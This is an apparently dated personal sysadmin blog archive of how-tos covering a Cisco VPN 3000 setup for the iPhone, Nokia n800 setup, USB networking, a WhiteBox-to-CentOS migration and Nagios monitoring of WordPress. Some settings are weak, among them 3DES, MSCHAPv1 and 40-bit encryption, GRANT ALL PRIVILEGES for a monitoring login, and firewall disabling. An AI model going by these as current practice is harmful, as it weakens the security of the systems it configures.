Building a free Dynamic DNS client with rackspace Cloud

As a cloud server customer you get access to rackspace’s free DNS service.

When I fist saw this product I had an instance light-bulb moment, I could stop paying for a dynamic DNS service and build my own private one. As a broadband (DHCP) user I have a very basic requirement of needing to regularly update an A record so that I can find my pc

To bring my idea into fruition I began researching; I need a cli tool which I could run from cron on my linux box (to send the DNS update requests to rackspace). In my research I found rscurl, a cli tool to control cloud servers, as rackspace have a standard API for all their products I have been able to use rscurl to develop rsdns.

rsdns is a series of cli tools to adding/deleting/changing rackspace DNS records, as part of the tool development I have created a script called rsdns-dc.sh to run on my machine, below is a short how to:

How to get free dynamic dns from rackspace.

Continue reading →

Cisco VPN 3k Config for iPhone

Recently I was asked if I could help setup a VPN connection between an Apple iPhone and a Cisco VPN Concentrator 3000, my 1st round of googling didn’t look good, there’s a discussion here complaining about how crap vpn support on the iphone is; further searching lead me to a Cisco document which specifically targets mac clients, this document is for ASA configuration, but if you look carefully* everything you need is in there.

*No, I didn’t get this working 1st time, it took me a good couple of hours of googling, but looking back I can see that all the info is there.

The key to getting this working is that the iphone side is not as configurable as it should be, so if you’re trying to get this to work you need to be talking to the IT administrator to get the concentrator side changed. The 1st word of warning is that the iphone client doesn’t support group authentication, so you’re going to be changing the base group, now by default most “production” groups will inherit settings from the base group, so you will need to make sure that if you change anything in the base group that it doesn’t effect your other L2L or Remote Access tunnels. (You have been warned.)

To get started, for whatever reason the iphone only supports cisco’s NAT-T implementation of IPSEC, so if you have a firewall or access-list in front of your concentrator you’re going to need to open up UDP 4500, then enable NAT Transparency. Another word of warning about NAT-T, we found that existing VPNS to Cisco Routers started to fail after enabling this, which was a bit odd as NAT-T wasn’t enabled under any of the L2L profiles, anyway, to fix the issue we enabled NAT-T on the routers (again make sure UDP 4500 is allowed though any ACLs) and under “conf t” issue:

crypto ipsec nat-transparency udp-encapsulation

So, back to the cVPN3k config……

Configuration -> Tunnel & Security -> NAT Transparency IPSEC over NAT-T - TICK

So a quick explanation of the above so you get the idea; from the tree on the left, click “Configuration” then “Tunnel & Security” then “NAT Transparency” and tick the box next to NAT-T.

Now you need to setup your PHASE 1 Proposal…

Config -> Tunnel & Sec -> IPSEC -> IKE Proposal

I called mine iphone, and you need to configure the following settings.

Authentication: Preshared Key (NOT the one with Xauth)
Hash: SHA-1
Encryption: 3DES
DiffeHelmen: Group 2

After phase one, comes PHASE 2:

Config -> Policy Manage -> Traffic Mgnt -> SA

Again, add the following settings and I called mine: iphone

Authentication: ESP / SHA
Encryption: 3DES
Enacapsulation: Transport
IKE Proposal = iphone (or whatever your phase 1 was called)

Then finally we start working with the groups, so as mentioned above you need to work with the base group:

Config -> User Management -> Base Group

And you need to enable the following, the other settings will be optional:

On the Base Group Tab,

Tunnel Protocol: Tick “L2TP over IPSec”

On the IPSEC Tab,

Authentication: Internal or NT depending on what you’ve already configured for other Remote Access Profiles.
IPSEC SA is set to: iphone
Default Preshared Key: Set this to something really really long (this will be your secret on the iphone)

On the PPTP/L2TP Tab,

L2TP Authentication Protocols: Tick MSCHAPv1 / MSCHAPv2
L2TP Encryption: Tick 40 & 128 B

DONE! Now with a little bit of luck your iphone should connect.

A Quick note about comments: All support requested will be deleted, I don’t have access to a concentrator to offer any meaningful advise, you use the above config at your own risk.

How to Import Vendor Specific Attributes into Cisco Secure ACS SE Applience

I wanted to write a document on how to import RADIUS VSA’s (vendor specific attributes) into cisco’s ACS SE (Solution Engine) appliance, the reason being that I couldn’t find any good examples on the net and cisco’s documentation just wasn’t clear enough.

My purpose was to use RADIUS authentication between a Nokia IPSO appliance such that users who access voyager or ssh get authenticated centrally; for RADIUS authentication to work your authentication server (in this case ACS) needs to supply the AAA client (in this can the ipso box) with a “return list attribute”. By default ACS doesn’t have the nokia attributes; to import attributes you need to get your hands on a dictionary file, for nokia ipso it’s /etc/nokia.dictionary – I’ve a copy here.

In you dictionary file you need to pick out some key elements, firstly the IANA-assigned enterprise code for the vendor and secondly a list of attributes to add. Using my nokia example the vendor code is the top line:

VENDOR Nokia 94

Thus the code is 94 , and everything below that are attributes.

So… Getting started with ACS, firstly if you have AAA clients which you want to use the new attributes you are going to need to delete them, and to be save reboot ACS. Now the import is done via the RDBMS sync process, since you do not have OS level access to ACS you need to upload a file called “accountActions.csv” (case sensitive), uploading this file tells the internal database to perform some commands or actions, examples would be to bulk import some users or bulk group changes, in our case we’re going to insert a new “Vendor” into the RADIUS database, and then insert some attributes.

I have created a file called createVendor_accountActions.csv if you renamed it to accountActions.csv and uploaded it to your ACS box via the RDBMS Sync tool (under system configuration) it’d perform the following actions:

- Command -1
- Priority – 8
- Action – 350 (Create new Vendor)
- Vendor Name – Nokia
- ACS Vendor Number – Auto Assigned
- Vendor ID – 94
- Date of DB Transaction – 25/09/2007 13:00
- Command – 2
- Priotity – 0
- Action – 355 (Restart ACS Services)
- Date of DB Transaction – 25/09/2007 13:00

The command numbers are just like primary key fields in a database or row numbers in a spreadsheet, they need to be unique and incremental for each csv file, and the priority specify and order to apply the commands, you I guess you could set the priorities all to 0 and rely on the command number to process the file in order, but I set a priority just in case. After you apply the file ACS will be temporarily unavailable as the services restart.

Now, we look at one line of importAttributes_accountActions.csv, again it would need to be renamed to accountActions.csv, before uploaded, and lets take a look at one line.

Command -1
Priority – 7
Action – 352 (Add VSA)
Attribute Name – Nokia-IMSI
The vendor to assign the attribute to – 94 (Nokia)
Attribute ID – 224
Attribue type – integer ( can only be integer, string or ipaddr)
Date of DB Transaction – 25/09/2007 13:00

Hopefully this all starts to make sense when looking at your dictionary file, again the final line of the file restarts the services. An important thing to not here is that if you create a new vendor you need to re-start the services before you can apply an attribute to it, and you need to restart the services again to use the attributes… at this point here it’s probably worth mentioning that the version of ACS SE I’m using now (4.1) is a windows appliance, so if at any point your box hasn’t done what you think a reboot won’t hurt

Now you can add your AAA client and in my example you could set the vendor to RADIUS (Nokia) , if you then go into interface configuration RADIUS (Nokia) will appear, go in there and tick all the boxes for “group”, finally if you go into your group setup at the very bottom will be a list of attributes you’ve imported and can use !

Just in can you need them here are my references:

RDBMS Sync Import Definitions

Importing an accountActions.csv file into ACS SE

Universe CD version of RDBM SSync import Defs

n800 Getting started (n00b) Guide… Part Two.

It’s taken me much longer to get this together than initially intended, so my apologies for that. Depending on your reasons for buying your n800 will make a difference to how much this document is relevant. What I wanted to do was concentrate on getting your n800 up and running, i.e. you’ve covered the basics, now lets install some applications to make this brick useful.

Before re-flashing my device, I always take a list of what is installed, here’s what’s on there at the moment…
becomeroot camera, canola dates devicescape fmradio hildon-theme-cacher hildon-theme-plankton maemo-serivice-handler maemo-wordpy maemokrypt media center microb-browser openvpn webmail notify mplayer navicore openssh oss-statusbar-cpu pidgin python2.5-runtime simplelauncher skype videocenter
I won’t cover them all here, as we’d all fall asleep, so I’ll pick out some favourites…let’s get installing!

Multi-Media, Music ‘n’ Video to you and me.

In my opinion every n800 should have Canola installed, it’s a great multimedia app. Canola has had some dependency issues in the past, so I’d recommend you install it before anything else. To get this working disable all your repo’s except the “Nokia Catalogue” and “Nokia Catalogue 3rd Party”, then hit this canola one click install.

UK Media Player (UKMP) is another great application to install for multi media, it has a couple of dependencies. You’ll need to switch on the extras repo, install mplayer (even if you don’t want ukmp, I’d recommend installing mplayer as it’s brilliant at playing back virtually any video file) and python either by using the application manager or the one click install files.

Utilities, those little extras you might need.

Here are some extras that’ll enhance your n800 experience, you should already have the xterm install right? But some other things that might take your fancy would be the oss-statusbar-cpuit adds a nice little applet to the systray that show how “busy” your n800 is, and you can add some commands to it too!

Camera & FM radio, are two Nokia apps that enhance what you can do with the n800 hardware that aren’t loaded by default, I’m not sure why… but to make it easier for you I’ve published a copy of my sources list, if your application manager has all these catalogues installed you should see the Camera and radio as options you can install.

Since writing my first document, OpenSSH has made its way into a repo, whether you use that or dropbear is up to you, I prefer openssh as it supports the keys that I use on the rest of my linux kit.

Plankton theme is probably one of the most popular themes added to an n800, to get it working you’ll need both files plankton + hildon theme cacher… also as quick tip, always change your theme to a default Nokia one before running a backup and re-flashing your device… basically it’ll stop the restore trying to use plankton before you’ve installed it.

Web, well it is a Nokia touch, I mean internet tablet after all.

I’d recommend you install the firefox derived web browser for maemo, it’ll allow you to run “non opera supported” sites like google docs. You can switch between the opera and firefox rendering engine; to do that you need to enable the hidden menu by editing /home/user/.browser and set hidden=true (Reference).

If you have a gmail or google apps account you’ll also want the Nokia mnotify, it’ll add a little applet to you systray … personally I’d prefer it to completely disappear if you haven’t got any new mail.

If you’re into instant messaging, then you’ll need a copy of pideon. It’s installed in components so if you’re an msn or googletalk user make sure you install the correct protocol support, if all else fails install them all

For mobile blogging you may want maemo-wordpy, it’s not yet something I’ve taken massive advantage of as I don’t have a keyboard and you need a reasonable amount of patience or practice to write a post with the stylus, but this is something I intend to tackle!

Pim, you know contacts and calendar stuff.

There’s no right answer to this, infact I’ve still yet to find something that suites me. As a user, I prefer Dates, Contacts and tasks by pimlico, they’re built on the existing nokia “contacts” back end (evolution data server), but I’ve yet to find a way of sync’ing them with anything which makes bulk importing and general day to day usage an issue.

The alternative is the GPE suite (calendar, contacts and todo). Lots of people recommend GPE, originally I had dependency conflicts on my when I was running the 2nd version of ITOS, I’m yet to install it, but I plan to as there’s been lots of complementary projects like erming for google calendar syncing and GPE summary – a desktop applet summary of your tasks and calendar

Ok, I think we’ll finish there….
I think this post long enough, I’d like to also do a part 3 and look at the security apps you can install on your n800, this won’t be so much of a n00b guide cause it won’t appeal to most people but it’s one of the reasons the n800 caught my eye originally.

CSS Styling Apache Directory Listings.

Before.

As part of my website overhaul, I’ve finally gotten round to styling my /files/ directory. I was surprised at how easy it was actually, and the benefits far out way the time taken to set it up, not only does this part of the site now “fit in”, but I can apply analytics tracking and adsense I’m sure there probably is a wordpress plugin that can achieve the same thing… probably better, but I find my list of plugins ever growing and since I don’t need on for this I figure if Apache can do it, let Apache do it!

The work can be done in one of two ways either by pasting Apache directives into a .htaccess file (in the directory you want to apply conf to), or in your httpd.conf you can wrap it all up in a

<Directory>

tag… something like

<Directory "/var/www/html/files/"> foobar> </Directory>

below is an example of a .htaccess file as that will apply to most people:

        RewriteEngine Off
        AddType text/html .shtml
        AddOutputFilter INCLUDES .shtml
        Options Indexes Includes
        IndexOptions FancyIndexing SuppressHTMLPreamble XHTML IconsAreLinks FoldersFirst SuppressDescription
        HeaderName /files/HEADER.shtml
        ReadmeName /files/README.shtml

Since my site uses wordpress with “pretty permalinks” enabled, the 1st thing I needed to do is disable mod re-write for the directory where I wanted listing enabled. Now if you check my /files/ page you’ll notice that the page title and tag line under “[LINICKX].com” change depending on what directory you are viewing, this is done with “Server Side Includes” (SSI), so the next two options in the above config set that up.

Now to take a look at the actual directory listing setup, it might be worth you taking a look at the Apache documentation for a full description, but the important ones to note are

Options Indexes Includes

to enable directory listing and switch on SSI, then you need

IndexOptions SuppressHTMLPreamble XHTML

to disable the default headers so that we can setup our style sheet and favour xHTML over HTML. Apache 2.2 users also have IndexStyleSheet available, but since I’m using CentOS4 we’ll do it this way. Finally you need the HeaderName, ReadmeName directives to tell Apache which file to look for (by default Apache looks for README.html, but that won’t support SSI)… note how my .shtml files are relative to my web root, these are not absolute paths on the file system, i.e. /files actually maps to /var/www/html/files.

You’re now good to go, HEADER.shtml should contain all the xHTML you want to appear before the directory listing, and README.html is everything after… make sure you include all the correct <html>, <body> and DOCTYPE tags.

Now you’ll want to get working is some dynamic content, for a simple “print current directory” you can use

<!--#echo var="REQUEST_URI"-->

in your html, further documentation on getting more magic is available here & here, I was able to knock up a simple line of code to print the current year at the bottom of the page….

<!--#config timefmt="%Y"-->
<small>Nick Bettison 2005 - <!--#echo var="DATE_LOCAL"--> &amp;copy; </small>;

Cool eh! The trick to watch out for is spaces in the above code, there should be no white space between

<--#echo

or the trailing

-->

After.

The final thing you’ll want to look at is those horible default icons! You have a couple of options: You can either simply replace/over-write the default ones (on my flavour of linux they are in /var/www/icons), or you can add

AddIcon /icons/tar.png .tar

to your htaccess file telling apache to look at tar.png rather than the default tar.gif, I found some deb archives which I extracted with file-roller (rather than trying to install anything) and simply changed the ones I was going to use…. I’m very please with the final result, I think it makes a big difference.

Happy Styling One & All!

USB Networking with Fedora 7 & n800

There are times where you cannot use WiFi, for example my workplace’s WLAN uses LEAP, which maemo doesn’t support. I found that setting up USB networking on my n800 was a bit of a pain since there isn’t a single document… if you check my del.icio.us feed you’ll see I bookmarked all I could find with a usbnet tag.

These are the steps I ran through to enable usb networking between my nokia n800 and my fedora 7 laptop.

First we’ll start with the basic setup… I’ll assume you’ve read a getting started article similar to mine and already have root & xterm. By default n800 has a usb interface configured, you just need to enable it, so on your n800 type:
sudo gainroot insmod /mnt/initfs/lib/modules/2.6.18-omap1/g_ether.ko ifup usb0
The default settings add an interface with a static ip of 192.168.2.15/24 with a default gateway of 192.168.2.14.

Now lets set up something similar on Fedora, you need to create a file in /etc/sysconfig/network-scripts called ifcfg-usb0 with the following…
DEVICE=usb0 BOOTPROTO=static IPADDR=192.168.2.14 BROADCAST=192.168.2.255 NETMASK=255.255.255.0 NETWORK=192.168.2.0 ONBOOT=no MII_NOT_SUPPORTED=no
Now plug the usb cable into both devices, and on your fedora box (as root) type
ifup usb0
You now have connectivity, of course if you have a default fedora install pinging 192.168.2.15 will fail because of the firewall, it is probably best to temporarily disable the firewall (/etc/init.d/iptables stop) to see if it works, if so move onto configuring your firewall correctly (/etc/init.d/iptables start starts it again) You may also get usb conflicts, you can try

rmmod uhci_hcd

but it will disable any USB devices, you have been warned.

With this basic connectivity setup you’ll have two issues; you only have connectivity between fedora & n800 nothing else works, and opening any application on n800 causes it to try and connect to your wifi, so lets look at those….

I’m going to assume you used system-config-securitylevel to configure your firewall, its worth noting that any changes you make now will be overwritten by any future use of system-config-securitylevel so it’s probably best to take a backup of /etc/sysconfig/ipatbles now and later when you’re finished.

So as root type:
iptables -I RH-Firewall-1-INPUT 2 -i usb -j ACCEPT iptables -I FORWARD 1 -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -I FORWARD 1 -s 192.168.2.0/24 -j ACCEPT iptables --table nat --append POSTROUTING --out-interface eth0 -s 192.168.2.0/24 -j MASQUERADE /etc/init.d/iptables save
This will allow all connectivity in from the usb interface allowing the n800 to send packets into the fedora box whilst the firewall is running, it will also NAT any traffic from the usb network hiding the n800 behind fedora so that you get onward connectivity. To get the NAT to work you need to enable ip forwarding, this allows fedora to pass pakets between interfaces, to do that type

echo 1 > /proc/sys/net/ipv4/ip_forward

and to get it to survive a reboot update /etc/sysctl.conf with

net.ipv4.ip_forward = 1

The final part is to enable name resolution (DNS), on n800, I updated /etc/resolv.conf with the opendns servers…
nameserver 208.67.222.222 nameserver 208.67.220.220
All things being equal you should now be able to ping www.google.com from your n800

To get applications to connect, I found on the latest version of ITOS that the DUMMY IAP didn’t work, so I stumbled across this solution.

Create an “ad hoc” wifi connection with static IPs… anything it doesn’t matter, and when that’s connected in xterm (as root) type ifconfig wlan0 down , you should now be able to connect to the web with your browser / skype etc over your usb network… sweet!

n800 Getting started (n00b) Guide… Part One.

I’ve had my n800 a little over two weeks, and the length of this post will propably explain why I haven’t posted about it before. I love the box, it looks sooo good, and the linux inside means that the scope of potential is just unimaginable… but… the experience isn’t perfect. I guess the experiece is very much like the windows / linux thing as a whole, what works is great, but sometimes getting linux “just so” can be more of an effort than in windows.

I’ve decided to write up all my notes, and bookmarks to make things easier for any other n800 n00bies Before we get started the compulsary screen shot !

Adding Software.
You’ll notice that there’s not a great deal installed, and what’s there very much resembles a phone ( *shock* ) and very quickly you’re going to want something extra. Now you’re in a bit of a chicken and an egg senarior, some software requires root access (more on that later) and some have a neat “single click install”.

First place to look for “single click installs” is maemo.org/downloads but you’ll notice, that some of the icons are greyed out, so I’d recomend going though the pain (lots of typing / hand writing with a stylus is) of setting up all the application repositries. To do so, open up the application manager, click (menu) Tools -> Application Catalogue -> New and simply fill in the fields for each repo one at a time. After completeing this you’ll be asked to refresh the catalogue, if you get errors you”l have to go through each one singley disabling it, doing a refresh until it works, and then check that you’ve made no mistakes; on the other hand if it works you’ll notice loads of new cool things you can install.

Got root?
If you’re new to linux, and don’t know about root, it’s basically the same as the “Administrator” account on windows… but with on exception root has NO RESTRICTIONS.. windows can (and does sometimes) stop the administrator from doing things (like deleting locked files) Unix / Linux will let the root account do anything, including wipe the file system, so use the root account with care.

You’re going to need root to do certain things, to use root you need to install “xterm” and “becomeroot” from you’re list of newly setup applications. Running xterm will give you a shell (like a windows dos prompt) where by you can directly type commands into the underlying linux, buy typing sudo gainroot you’ll notice the prompt will change from $ to # you now have god like access to your box… at this point I recomend you change the root password from “rootme” to something more secure, type passwd and follow the instructions.

(If that doesn’t work, read below, install ssh and see this)

Remote Access.
You can get remote access onto your n800 via a couple of ways. If you like a GUI try x11vnc from here you can get a vncviewer (for windows or linux) download the .deb file and open it with the application manager. I had no problems getting this working, but I did find using the mouse and keyboard on my pc a little slow and un-responsive so ymmv

The otherway, and what I use is an SSH sesion, much quicker very usable, and like running the xterm from your pc. From the list of installable applications choose “dropbear server” and using a client (try putty for windows).

To connect to your Internet Tablet you will need to know its IP address. To find this open the Connection manager and select Internet connection > IP address from the menu. Tip – you may find it easier to use a fixed IP address.

you can ssh root@ipaddress (using the password you set before, see why I said to change it) of course to be safe you can ssh user@ipaddress, but you’ll have to change the password for user like you did before but in a $ shell.

You’ll also want to disable ssh from starting automatically, you don’t want some script-kiddy trying to hack your box whilst you’re connected to a wifi network, as root type update-rc.d -f dropbear remove , then when you need it you can do /etc/init.d/dropbear start

Battery Life.
The 1st thing I noticed when I got my new toy was that I hammered the battery and only got about 1 -> 2 hours wireless useage. I can confirm that using adhoc wireless connections eat the battery, out in the world with proper AP’s battery life seems fine (3hrs+ online perhaps), but at home it really doesn’t last that long.

There are lots of things you can do, to improve battery life. 1st up enable “soft power off” , this will allow you to hold down the power button to but n800 into standby mode, really usefull for hitting before you put it back in your pocket. See this post here for a full set of instructions. Next up, tweak your wireless settings.. what you set here will depend on what you brought the n800 for, I would have thought most people would disable the “search for wifi” functionality as you probably don’t need it to automagically connect to a network whilst your driving or walking, so under the control panel -> connectivity set the search interval to “Never”. I’ve also screwed my Idle times right down so that it disconnets if I’m not doing anything …I haven’t yet been disconnected when I was doing something, but I do usually have to hit “connect to network” before opening a brower etc.

I’d also suggest using offline mode when you’re watching a video or something, that ways “stuff” isn’t happening in the background when you’re not using it.

End of Part One
I think that’s long enough, those few tips should be enough to make most users 1st experience better, in part two I’m going to talk about Apps, what I’ve installed and what didn’t get uninstalled

A Linux / Command line: how to upload to wordpress wp-plugins.org via subversion ( SVN )

Could that title get any longer !

Hopefully you get the point, sometimes you need different tools for different jobs, if you want a full development platform with SVN support I suggest you take a look at eclipse (with subclipse ) but what if you already have done the development and you just want to do a quick upload.

My phpbb_recent_topics plugin is hosted here, and when the nice guys at wordpress gave me an svn account, I just wanted a quick way to upload what I’ve done. Now I must stress this may not be the “proper” way to use svn (there’s a book for that) but it is enough to achieve what we want, a straight forward upload.

I’m using redhat, so the 1st step was to install dag’s subversion rpm , I also needed to setup an “editor” variable for commenting.

SVN_EDITOR=vi
export SVN_EDITOR

Then, I went into a directory onto my server, and downloaded a copy of the existing subversion directory structure.

[nick@SERVER wp_plugins]$ svn checkout https://svn.wp-plugins.org/phpbb-recent-topics/
A    phpbb-recent-topics/trunk
A    phpbb-recent-topics/branches
A    phpbb-recent-topics/tags
Checked out revision 9232.
[nick@SERVER wp_plugins]$

My plugin (at the time) was on version 1, so my 1st steps were to create a version 1 tag, add it to svn, get the stable copy of my plugin, add that to svn.

[nick@SERVER wp_plugins]$ cd phpbb-recent-topics/
[nick@SERVER phpbb-recent-topics]$ ls
branches  tags  trunk
[nick@SERVER phpbb-recent-topics]$ cd tags/
[nick@SERVER tags]$ mkdir 0.1
[nick@SERVER tags]$ cd ..
[nick@SERVER wp_plugins]$ svn add phpbb-recent-topics/tags/*
A         phpbb-recent-topics/tags/0.1
[nick@SERVER wp_plugins]$ cd phpbb-recent-topics/tags/0.1/
[nick@SERVER 0.1]$ wget http://www.linickx.com/files/php/phpbb_recent_topics.txt
[nick@SERVER 0.1]$ mv phpbb_recent_topics.txt phpbb_recent_topics.php
[nick@SERVER 0.1]$ svn add phpbb_recent_topics.php
A         phpbb_recent_topics.php
[nick@SERVER 0.1]$

Finally I updated everything, and uploaded (committed) my files.

[nick@SERVER 0.1]$ cd ../../../
[nick@SERVER wp_plugins]$ svn update phpbb-recent-topics/
At revision 9232.
[nick@SERVER wp_plugins]$ svn --username linickx commit phpbb-recent-topics/
Adding         phpbb-recent-topics/tags/0.1
Adding         phpbb-recent-topics/tags/0.1/phpbb_recent_topics.php
Transmitting file data .......
Committed revision 9233.
[nick@SERVER wp_plugins]$

Remember this doesn’t publish your plugin on wordpress.org, to do that you need a valid readme.txt in the trunk directory, but as you can see once you’ve created all the files on your local box, it’s just a few commands to get your work uploaded.

Did you notice that the wordpress svn supports SSL ?

How to Migrate from White Box Linux 4 to CentOS 4.4

There are somethings that you just never get round to, my nagios box was still running whitebox linux, and I’ve finally gotten round “upgrading” it to CentOS… yeah ok, upgrade is arguable, but you get my point.

First off a warning: Don’t do this ! All the documentation, for CentOS, RHEL, Fedora, any redhat linux all say, clean installs are the best way, and upgrades are not advised…. therefore I offer no support or warranty that this will work, in fact, I you advise you to read this post, but step away from your consoles !

But, if you think it might be a laugh, the centos documentation is a bit old, and not 100% correct, so here is what I did. First up (as root – obviously), clear out your yum cache,and install the CentOS gpg key.

yum clean all
rpm --import http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-4

Next, install some base centos packages, take not that some need to be forced on

rpm -Uvh --nodeps http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/centos-release-4-4.2.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-elementtree-1.2.6-4.2.1.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-sqlite-1.1.7-1.2.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/sqlite-3.3.3-1.2.i386.rpm
rpm -Uvh --force http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-urlgrabber-2.9.8-2.noarch.rpm
rpm -Uvh --nodeps http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/yum-2.4.3-1.c4.noarch.rpm

finally remove the whitebox rpm db.

rpm -ev rpmdb-whitebox

Move any “whitebox” mirrors still in /etc/yum.repos.d and

yum install rpmdb-CentOS

Once you have that sorted, you can complete the upgrade with

yum update
reboot

& cross your fingers
If you come across the following warnings while using yum: Warning, could not load sqlite, falling back to pickle , I found…

yum install python-sqlite

Fixed the problem. And there we have it, all my boxes are now running CentOS – yay – just in time to look at the CentOS 5 upgrade

Dependency Problems ?
If a whitebox rpm is newer than the CentOS one, it won’t get upgraded, this might cause problems when installing new packages via yum. To solve the problem download the rpm manually from http://www.centos.org/modules/tinycontent/index.php?id=13 and force an upgrade

rpm --force -Uvh Something-CentOS.rpm

UPDATE: If you’re using something like Root Kit Hunter, you will notice a load of md5 hashes fail, these are whitebox rpm’s that didn’t need upgrading, to correct the problem you need to replace these with CentOS versions.. example rkhunter output:

/sbin/init  [ BAD ]

Find which rpm, init belongs to

# rpm -q --whatprovides /sbin/init
SysVinit-2.85-34.3

and upgrade it

wget http://www.mirrorservice.org/sites/mirror.centos.org/4.4/os/i386/CentOS/RPMS/SysVinit-2.85-34.3.i386.rpm
rpm --force -Uvh SysVinit-2.85-34.3.i386.rpm

How to Monitor wordpress with Nagios

WordPress like many web applications relies on apache (or something else) to serve the HTTP pages and mysql to store the data. Your wordpress website is important to you, so you need an external monitoring system to let you know what’s going on.

Nagios is a great, enterprise class, open-source monitoring application; and what you need do is configure it to exactly represent how wordpress works; if you can get that right you can immediately get notified if any piece of the puzzle fails.

I’m going to write up a simple example of how to monitor wordpress and it’s associated jigsaw pieces, so we’re going to setup one host with appropriate dependant services. Ultimately, you should configure nagios to suit exactly how your environment works, but hopefully this “how to” will get you started.

Basic Config.
To configure nagios you need have services (such as http) associated with hosts; to get started, I’m going to have to assume you have followed another “how to” and have nagios up and running, and monitoring localhost, you can even use my own config generator to get you started Basically you should have a generic check-host-alive host.cfg entry like so:

define host{
        use                     generic-host            ; Name of host template to use
        host_name               linickx.com
        alias                   My WebSite
        address                 www.linickx.com
        check_command           check-host-alive
        max_check_attempts      10
        check_period            24x7
        notification_interval   120
        notification_period     24x7
        notification_options    d,r
        contact_groups  admins
        }

The first (and easiest) part of wordpress to monitor is the web-server which serves the web pages on port 80, so a /etc/nagios/serivces.cfg entry like.

define service{
	use                             generic-service         ; Name of service template to use
	host_name                       www.linickx.com
	service_description             HTTP
	is_volatile                     0
	check_period                    24x7
	max_check_attempts              10
	normal_check_interval           1
	retry_check_interval            1
	contact_groups                  admins
	notification_options            w,u,c,r
	notification_interval           960
	notification_period             24x7
	check_command                   check_http
}

Getting Technical.
Have you noticed the deliberate mistake ? I’m using resolvable names in my config files, this is deliberate as my website is on a shared server, and check_http with an IP address is very different to check_http www.linickx.com , but in order for www.linickx.com to work, DNS needs to be working. While we are here, it makes sense to monitor that as well. In /etc/nagios/checkcommands.cfg add an entry similar to….

# 'check_dns' command definition
define command{
        command_name    check_dns_linickx-com
        command_line    $USER1$/check_dns -H www.linickx.com -a 69.73.189.228
        }

Where the -a ip address , is the ip of your “A Record”, if you don’t know what that is you can use dnsstuff.com to find it for you. You can now create a service that uses that command…

define service{
        use                             generic-service         ; Name of service template to use
        host_name                       linickx.com
        service_description             DNS
        is_volatile                     0
        check_period                    24x7
        max_check_attempts              10
        normal_check_interval           5
        retry_check_interval            1
        contact_groups                  admins
        notification_options            w,u,c,r
        notification_interval           960
        notification_period             24x7
        check_command                   check_dns_linickx-com
        }

We have HTTP and DNS monitored, all the wordpress data is stored in a mySQL database, so now you need to monitor that, to do that you need to setup another checkcommand; add the following.

# mySQL command definition
define command{
	command_name    check_mysql
	command_line    $USER1$/check_mysql -H $HOSTADDRESS$ -u $ARG1$ -p $ARG2$
}

This check command will log into the database and report OK if it is working, much better than check_tcp 3306 . Now you can add the following service entry

define service{
	use                             generic-service         ; Name of service template to use
	host_name                       www.linickx.com
	service_description             mySQL
	is_volatile                     0
	check_period                    24x7
	max_check_attempts              10
	normal_check_interval           5
	retry_check_interval            1
	contact_groups                  admins
	notification_options            w,u,c,r
	notification_interval           960
	notification_period             24x7
	check_command                   check_mysql!USERNAME!PASSWORD
}

For this to work the user will need to have permissions to log into the nagios machine, so if you followed the wordpress codex and added “TO wordpressusername@localhost” in your mysql statement, you’ll need to add that to run

GRANT ALL PRIVILEGES ON databasename.* TO wordpressusername@NAGIOS-SERVER;

where NAGIOS-SERVER is a resolvable name or ip address. Note: Don’t forget about firewalls ! Make sure that TCP 3306 is open between your nagios box & wordpress website.

The bit that actually monitors wordpress.
You are now independently checking both HTTPD & MYSQL, but what if wordpress can’t actually connect (lets say wp-config.php is screwed), both these checks will pass and nagios will stay green; what you need to do is monitor a page. If that page works , everything’s fine, if the page fails (and you get the default database connection error page) then nagios flags and alert. We’re going to add another checkcommand

# 'check linickx.com wordpress' command definition
define command{
        command_name    check_wp_linickx
        command_line    $USER1$/check_http -H $HOSTADDRESS$ -u /blog/about-me -s "About Me"
        }

You can alter this in anyway you want, but what it does is it looks for http://$HOSTADDRESS$/blog/about-me (so http://www.linickx.com/blog/about-me) and if that page returns “About Me” then everything is OK.

Tidying up with dependencies.
We’ve already established that if either mySQL, http or DNS fails, wordpress will fail, so we want to ensure we don’t get hit with double alerts about the same problem, enter dependencies. HTTP is dependant on DNS, enter the following in /etc/nagios/dependencies.cfg (make sure you have cfg_file=/etc/nagios/dependencies.cfg in /etc/nagios/nagios.cfg )

define servicedependency{
        host_name                       linickx.com
        service_description             DNS
        dependent_host_name             linickx.com
        dependent_service_description   HTTP
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

and WordPress is dependant on HTTP & mySQL , so you need…

define servicedependency{
        host_name                       linickx.com
        service_description             HTTP
        dependent_host_name             linickx.com
        dependent_service_description   WordPress
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

define servicedependency{
        host_name                       linickx.com
        service_description             mySQL
        dependent_host_name             linickx.com
        dependent_service_description   WordPress
        execution_failure_criteria      n
        notification_failure_criteria   u,c
        inherits_parent         1
        }

You can check your config with nagios -v /etc/nagios/nagios.cfg , assuming you have no errors wait for checks to go green and begin testing. Tests you can run can be anything from unplugging the cable from your nagios box to simulate a complete failure, to stopping the mysql service on your website to make sure check_mysql works.

Making it pretty for the hell of it.
Nagios has a web interface, one of the things we can do is customize it to represent our config, how about a pretty icon for our website ? or a custom wordpress action ? Here’s how to setup a pretty icon and action (button to click on) for our wordpress service.

To get started, you’ll probably need a copy of the wordpress logo from the svn , I then cut the “W” out to make a square icon, but you can do what you like Firstly something non essential: To display any icon in nagios as a “host icon” you’re going to need it in both png and gd2 image format, you’ll have to install a conversion tool. (for redhat)

yum install gd-progs

to run the conversion, use the following…

pngtogd2 wordpress-logo.png wordpress-logo.gd2 0 1

that’ll give you a chunk size of 0 and no compression as recommended for nagios.

But if you just want service icons, then you can get away with just a png. Save any custom images in /usr/share/nagios/images/logos/ make sure they’re readable ( e.g. chmod 644 file ) and we’re good to go.

So the config file, 1st make sure you have cfg_file=/etc/nagios/serviceextinfo.cfg enabled in /etc/nagios/nagios.cfg . My sericeextinfo.cfg has the following…

define serviceextinfo{
	host_name               linickx.com
	service_description     WordPress
	notes                   My website  powered by wordpress !
	icon_image              wordpress-w.png
	icon_image_alt          WordPress
